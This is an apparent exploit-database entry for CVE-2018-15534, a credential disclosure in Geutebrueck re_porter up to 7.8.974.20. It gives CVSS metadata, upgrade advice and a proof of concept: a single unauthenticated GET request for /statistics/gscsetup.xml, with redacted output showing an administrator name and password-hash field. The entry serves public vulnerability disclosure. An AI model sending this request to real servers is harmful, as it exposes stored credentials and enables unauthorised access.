Geutebrueck re_porter 7.8.974.20 - Credential Disclosure

vendor:

re_porter

by:

Kamil Suska

9.8

CVSS

CRITICAL

Credential Disclosure

200

CWE

Product Name: re_porter

Affected Version From: prior 7.8.974.20

Affected Version To: 7.8.974.20

Patch Exists: YES

Related CWE: CVE-2018-15534

CPE: a:geutebrueck:re_porter

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: None

2018

Geutebrueck re_porter 7.8.974.20 – Credential Disclosure

An unauthenticated attacker can send a specially crafted HTTP request to the vulnerable server to disclose credentials stored in the gscsetup.xml file.

Mitigation:

Upgrade to version 7.8.974.20 or later.

Source

Exploit-DB raw data:

# Exploit Title: Geutebrueck re_porter 7.8.974.20 - Credential Disclosure
# Date: 2018-08-03
# Exploit Author: Kamil Suska
# Vendor: https://www.geutebrueck.com/en_US.html
# Link: https://www.sourcesecurity.com/geutebruck-re-porter-16-technical-details.html
# Version: prior 7.8.974.20
# CVE-2018-15534

# PoC

GET /statistics/gscsetup.xml HTTP/1.1
Host: example.com:12003

# Result (Redacted):

<Node Name="UserList" NodeID="xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx">
      <Node Name="0000" NodeID="xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx">
        <Value Name="Name" ValueType="ntWideString" Value="Sysadmin"/>
        <Value Name="Password" ValueType="ntString"
Value="##MD5passwordhash##"/>
        <Value Name="UserRights" ValueType="ntInt32" Value="0x00000001"/>
        <Node Name="SecondUserList"
NodeID="xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx">
        </Node>